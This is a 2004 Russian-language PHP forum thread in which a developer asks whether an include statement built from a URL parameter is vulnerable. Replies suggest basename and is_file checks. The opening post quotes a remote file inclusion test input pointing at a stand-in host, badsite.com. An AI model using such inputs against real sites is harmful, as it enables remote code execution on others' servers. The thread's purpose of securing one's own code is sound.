Forum Webscript.Ru

Программирование => PHP => Тема начата: Nicca от 16 Августа 2004, 18:53:35

Название: Вопрос по инклуду
Отправлено: Nicca от 16 Августа 2004, 18:53:35

У меня есть такие строки в скрипте:
include(\'languages/\'.$lang.\'.php\');
где переменная $lang приходит из адресной строки. Реально ли мой скрипт взламать? Если да то как. Я пробовал подставлять в адр. строку: news.php?lang=http://badsite.com/1.php. Но вроде бы все нормально - выдает ошибку. Подскажите плз.

Название: Вопрос по инклуду
Отправлено: Меняздесьдавнонет от 16 Августа 2004, 19:08:32

теоретически - возможно.
при определенных условиях

Название: Вопрос по инклуду
Отправлено: Nicca от 17 Августа 2004, 19:45:31

а подробнее можно? С примером.

Название: Вопрос по инклуду
Отправлено: Меняздесьдавнонет от 17 Августа 2004, 20:06:58

а спину тебе вареньем не помазать?

Название: Вопрос по инклуду
Отправлено: Макс от 17 Августа 2004, 23:02:39

Цитировать

Nicca:
У меня есть такие строки в скрипте:
include(\'languages/\'.$lang.\'.php\');
где переменная $lang приходит из адресной строки. Реально ли мой скрипт взламать?

"Не ищи черного добермана в темном сарае, особенно если он там есть" (с) не помню кто.

Привыкай, что все входные данные надо проверять. Ну или хотя бы фильтровать. Добавь в код [p]basename[/p] и сразу от многих проблем избавишься. Ну и чтобы было более правильно - можно еще проверять, существует ли файл - [p]is_file[/p]

Название: Вопрос по инклуду
Отправлено: BabyBoo от 18 Августа 2004, 01:33:21

[OFF]"Не ищи черного добермана в темном сарае, особенно если он там есть" (с) не помню кто.

Хех класс... Макс вспомни плз. кто - я себе на стенку повешу :)[/off]